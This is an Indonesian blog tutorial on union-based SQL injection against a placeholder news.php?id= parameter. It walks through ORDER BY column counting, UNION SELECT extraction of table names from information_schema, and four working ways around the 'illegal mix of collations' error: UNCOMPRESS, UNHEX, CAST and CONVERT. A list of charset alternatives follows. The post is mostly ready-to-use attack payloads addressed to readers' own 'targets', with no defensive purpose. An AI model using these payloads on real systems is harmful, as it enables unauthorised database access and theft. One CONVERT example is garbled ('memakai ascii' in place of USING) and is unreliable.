Skip to main content
Home Sqli Tutorial Cara Bypass Sql Injection Illegal Mix Of Collations

Cara Bypass Sql Injection Illegal Mix Of Collations


Oke pada kesempatan kali ini gw mau share tutorial Cara Bypass Sql Injection Illegal Mix of Collations.

Yosh, mari kita mulai saja.
Target http://www.site.com/news.php?id=5 (anggap aja itu sasaran kalian)

Seperti biasa, yang pertama cari berapa jumlah columnnya memakai perintah order+by+--
Contoh disini gw mendapat pesan error diangka 5,

http://www.site.com/news.php?id=13+order+by+5-- pesan error!
Berarti jumlah columnya ada 4.

Selanjutnya kita melaksanakan pertintah union+select+1,2,3-- dan seterusnya, tergantung kalian ketika melaksanakan perintah order+by+1-- sampai mendapatkan pesan error pass diangka keberapa.

Contoh http://www.site.com/news.php?id=-13+union+select+1,2,3,4-- dan disini gw mendapat angka 1 dan 3.

Sekarang saatnya mencoba mendapatkan table dan untuk perintahnya menyerupai ini,

http://www.site.com/news.php?id=-13+union+select+1,2,concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
Dan disini gw mendapat pesan error menyerupai ini " illegal mix of collations for operation 'UNION' " kok sanggup ya? gatau :v mari kita bypass.

Berikut methode yang sanggup dipakai untu bypass illegal mix of collations

1. Menggunakan UNCOMPRESS 
Contoh query menyerupai ini http://www.site.com/news.php?id=-+union+select+1,2,uncompress(compress(concat(table_name))),4+from+information_schema.tables+where+table_schema=database()--
Bypassed!!!

2. Menggunakan UNHEX
Contoh query menyerupai ini
http://www.site.com/news.php?id=-+union+select+1,2,unhex(hex(concat(table_name))),4+from+information_schema.tables+where+table_schema=database()--
Bypassed!!!

3. Menggunakan CAST()
Contoh query menyerupai ini
http://www.site.com/news.php?id=-+union+select+1,2,cast(table_name as binary),4+from+information_schema.tables+where+table_schema=database()--
Bypassed!!!

4. Menggunakan CONVERT()
Contoh query menyerupai ini
http://www.site.com/news.php?id=-+union+select+1,2,convert(table_name memakai ascii),4+from+information_schema.tables+where+table_schema=database()--
Bypassed!!!

Dan berikut ini beberapa advance metode untuk convert()
Dalam convert() fungsi kalau ascii tidak berfungsi maka kita sanggup memakai sebagai ascii,

1. ujis
2. ucs2
3. tis620
4. swe7
5. sjis
6. macroman
7. macce
8. latin7
9. latin5
10. latin2
11. koi8u
12. koi8r
13. keybcs2
14. hp8
15. geostd8
16. gbk
17. gb2132
18. armscii8
19. ascii
20. cp1250
21. big5
22. cp1251
23. cp1256
24. cp1257
25. cp850
26. cp852
27. cp866
28. cp932
29. dec8
30. euckr
31. latin1

Nah itu beliau cara bypass sql injection illegall mix of collations. Sekian dari gw biar bermanfaat.

Thanks to Author: Rai Muzammal Hussain a.k.a RAi Je

You Might Also Like:

Comment Policy: Silahkan tuliskan komentar Anda yang sesuai dengan topik postingan halaman ini. Komentar yang berisi tautan tidak akan ditampilkan sebelum disetujui.
Buka Komentar
Tutup Komentar